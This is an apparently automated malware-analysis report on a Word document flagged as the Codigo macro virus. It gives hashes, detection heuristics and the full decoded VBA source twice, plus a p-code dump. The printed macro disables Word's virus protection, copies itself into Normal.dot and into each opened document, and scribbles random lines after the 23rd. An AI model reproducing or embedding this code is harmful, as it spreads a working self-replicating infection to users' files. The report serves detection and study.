Office (OLE) malware analysis — malicious · bbed7cb46259b2f7

MALICIOUS

Office (OLE)

35.0 KB Created: 2000-07-25 04:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 084067dc29fc56db8c58acd77eec7a50 SHA-1: 0b23ae884033534d59b6fefa864cce3792248e76 SHA-256: bbed7cb46259b2f7e43375226338267eb89358c262c5172bb8c4a00ef44aeaee

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro designed to copy its code into the Normal.dot template and the active document. The macro also includes logic that executes if the current day is after the 23rd, drawing lines on the document, which may be a distraction or a secondary payload trigger. The ClamAV detection as 'Doc.Trojan.Codigo-1' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Codigo-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Codigo-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5285 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5285 bytes
SHA-256: `99f8ef02360e89f860f4acfb156b73ffe9ef76d611d9d8e060af47b01bb53e7d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Esta Infectado Private Sub Document_Close() On Error Resume Next Dim i, x1, x2, y1, y2 As Integer Dim Figura Call Document_Open Randomize If Day(Now()) > 23 Then For i = 1 To 100 x1 = Int(1000 * Rnd(1000)) x2 = Int(1000 * Rnd(1000)) y1 = Int(1000 * Rnd(1000)) y2 = Int(1000 * Rnd(1000)) Figura = ActiveDocument.Shapes.AddLine(x1, y1, x2, y2) Next i End If ActiveDocument.Save NormalTemplate.Save End Sub Private Sub Document_Open() On Error Resume Next Dim ad, nt As Object Dim MiCodigo As String Dim DocInfectado As Boolean Dim NormalInfectado As Boolean Options.VirusProtection = False 'Inicializar Variables Set ad = ActiveDocument.VBProject.VBComponents.Item(1) Set nt = NormalTemplate.VBProject.VBComponents.Item(1) MiCodigo = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) If Len(MiCodigo) < 1 Then MiCodigo = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) End If Dim EsteCogigo As String EsteCodigo = Mid(MiCodigo, 1, Len(MiCodigo)) nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines nt.CodeModule.AddFromString EsteCodigo ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines ad.CodeModule.AddFromString EsteCodigo NormalTemplate.Save ActiveDocument.Save End Sub ' Processing file: /opt/analyzer/scan_staging/30dc8605cadb4c8d873ee59f6f821aa3.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 6074 bytes ' Line #0: ' QuoteRem 0x0000 0x000E "Esta Infectado" ' Line #1: ' FuncDefn (Private Sub Document_Close()) ' Line #2: ' OnError (Resume Next) ' Line #3: ' Line #4: ' Dim ' VarDefn i ' VarDefn x1 ' VarDefn x2 ' VarDefn y1 ' VarDefn y2 (As Integer) ' Line #5: ' Dim ' VarDefn Figura ' Line #6: ' Line #7: ' Line #8: ' ArgsCall (Call) Document_Open 0x0000 ' Line #9: ' Line #10: ' ArgsCall Read 0x0000 ' Line #11: ' ArgsLd Now 0x0000 ' ArgsLd Day 0x0001 ' LitDI2 0x0017 ' Gt ' IfBlock ' Line #12: ' Line #13: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x0064 ' For ' Line #14: ' LitDI2 0x03E8 ' LitDI2 0x03E8 ' ArgsLd Rnd 0x0001 ' Mul ' FnInt ' St x1 ' Line #15: ' LitDI2 0x03E8 ' LitDI2 0x03E8 ' ArgsLd Rnd 0x0001 ' Mul ' FnInt ' St x2 ' Line #16: ' LitDI2 0x03E8 ' LitDI2 0x03E8 ' ArgsLd Rnd 0x0001 ' Mul ' FnInt ' St y1 ' Line #17: ' LitDI2 0x03E8 ' LitDI2 0x03E8 ' ArgsLd Rnd 0x0001 ' Mul ' FnInt ' St y2 ' Line #18: ' Ld x1 ' Ld y1 ' Ld x2 ' Ld y2 ' Ld ActiveDocument ' MemLd Shapes ' ArgsMemLd AddLine 0x0004 ' St Figura ' Line #19: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #20: ' EndIfBlock ' Line #21: ' Line #22: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #23: ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' Line #24: ' Line #25: ' EndSub ' Line #26: ' Line #27: ' FuncDefn (Private Sub Document_Open()) ' Line #28: ' OnError (Resume Next) ' Line #29: ' Line #30: ' Dim ' VarDefn ad ' VarDefn nt (As Object) ' Line #31: ' Dim ' VarDefn MiCodigo (As String) ' Line #32: ' Dim ' VarDefn DocInfectado (As Boolean) ' Line #33: ' Dim ' VarDefn NormalInfectado (As Boolean) ' Line #34: ' Line #35: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #36: ' Line #37: ' QuoteRem 0x0000 0x0015 "Inicializar Variables" ' Line #38: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set ad ' Line #39: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set nt ' Line #40: ' Line #41: ' LitDI2 0x0001 ' Ld ad ' MemLd CodeModule ' MemLd CountOfLines ' Ld ad ' Mem ... (truncated)

SHA-256: 99f8ef02360e89f860f4acfb156b73ffe9ef76d611d9d8e060af47b01bb53e7d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Esta Infectado
Private Sub Document_Close()
On Error Resume Next

Dim i, x1, x2, y1, y2 As Integer
Dim Figura


Call Document_Open

Randomize
If Day(Now()) > 23 Then

  For i = 1 To 100
    x1 = Int(1000 * Rnd(1000))
    x2 = Int(1000 * Rnd(1000))
    y1 = Int(1000 * Rnd(1000))
    y2 = Int(1000 * Rnd(1000))
    Figura = ActiveDocument.Shapes.AddLine(x1, y1, x2, y2)
  Next i
End If

ActiveDocument.Save
NormalTemplate.Save

End Sub

Private Sub Document_Open()
On Error Resume Next

Dim ad, nt As Object
Dim MiCodigo As String
Dim DocInfectado As Boolean
Dim NormalInfectado As Boolean

Options.VirusProtection = False

'Inicializar Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

MiCodigo = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
If Len(MiCodigo) < 1 Then
   MiCodigo = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If

Dim EsteCogigo As String
    EsteCodigo = Mid(MiCodigo, 1, Len(MiCodigo))

nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString EsteCodigo

ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString EsteCodigo

NormalTemplate.Save
ActiveDocument.Save
End Sub


' Processing file: /opt/analyzer/scan_staging/30dc8605cadb4c8d873ee59f6f821aa3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6074 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E "Esta Infectado"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn i
' 	VarDefn x1
' 	VarDefn x2
' 	VarDefn y1
' 	VarDefn y2 (As Integer)
' Line #5:
' 	Dim 
' 	VarDefn Figura
' Line #6:
' Line #7:
' Line #8:
' 	ArgsCall (Call) Document_Open 0x0000 
' Line #9:
' Line #10:
' 	ArgsCall Read 0x0000 
' Line #11:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0017 
' 	Gt 
' 	IfBlock 
' Line #12:
' Line #13:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' Line #14:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St x1 
' Line #15:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St x2 
' Line #16:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St y1 
' Line #17:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St y2 
' Line #18:
' 	Ld x1 
' 	Ld y1 
' 	Ld x2 
' 	Ld y2 
' 	Ld ActiveDocument 
' 	MemLd Shapes 
' 	ArgsMemLd AddLine 0x0004 
' 	St Figura 
' Line #19:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #23:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #24:
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' 	FuncDefn (Private Sub Document_Open())
' Line #28:
' 	OnError (Resume Next) 
' Line #29:
' Line #30:
' 	Dim 
' 	VarDefn ad
' 	VarDefn nt (As Object)
' Line #31:
' 	Dim 
' 	VarDefn MiCodigo (As String)
' Line #32:
' 	Dim 
' 	VarDefn DocInfectado (As Boolean)
' Line #33:
' 	Dim 
' 	VarDefn NormalInfectado (As Boolean)
' Line #34:
' Line #35:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #36:
' Line #37:
' 	QuoteRem 0x0000 0x0015 "Inicializar Variables"
' Line #38:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ad 
' Line #39:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set nt 
' Line #40:
' Line #41:
' 	LitDI2 0x0001 
' 	Ld ad 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld ad 
' 	Mem
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.